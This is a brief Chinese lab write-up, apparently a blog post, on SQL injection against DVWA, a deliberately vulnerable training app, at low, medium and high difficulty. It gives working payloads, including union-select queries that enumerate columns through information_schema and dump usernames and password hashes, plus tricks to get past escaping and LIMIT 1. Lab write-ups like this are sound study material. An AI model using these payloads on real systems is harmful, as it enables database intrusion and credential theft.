DVWA之SQL注入(低中高级)
Low
一、判断注入类型
1、输入1,查询成功
2、输入1’ or 1='1查询成功
二、查询数据库中字段数
1、输入 2、输入1’ or 1=1 order by 3#
1’ or 1=1 order by 1# 查询失败
1’ or 1=1 order by 2#均查询成功
判断数据库语句中只有两个字段名,First name和Surname
三、查询数据库的库名
输入’union select database(),user()’
查询到当前数据库名为dvwa
四、查询数据库中表名称
五、获取表中字段名
'union select 1,group_concat(column_name) from information_schema.columns where table_name=’users’#
六、尝试获取user及password
'union select user,password from users#
七、尝试破解口令
Medium
查看源码发现特殊字符被mysqli_real_escape_string函数转义
一、输入1’ or 1=1 #
发现‘’被函数转义
二、输入 1 or 1=1# 查询成功
High
查看源码发现相比于medium知识添加了LIMIT1,可通过#将其注释
'union select user,password from users#成功注入
分类:
安全相关 / 安全靶场类
, 安全相关 / CTF
【推荐】国内首个AI IDE,深度理解中文开发场景,立即下载体验Trae
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步
· 阿里最新开源QwQ-32B,效果媲美deepseek-r1满血版,部署成本又又又降低了!
· SQL Server 2025 AI相关能力初探
· 单线程的Redis速度为什么快?
· AI编程工具终极对决:字节Trae VS Cursor,谁才是开发者新宠?
· 开源Multi-agent AI智能体框架aevatar.ai,欢迎大家贡献代码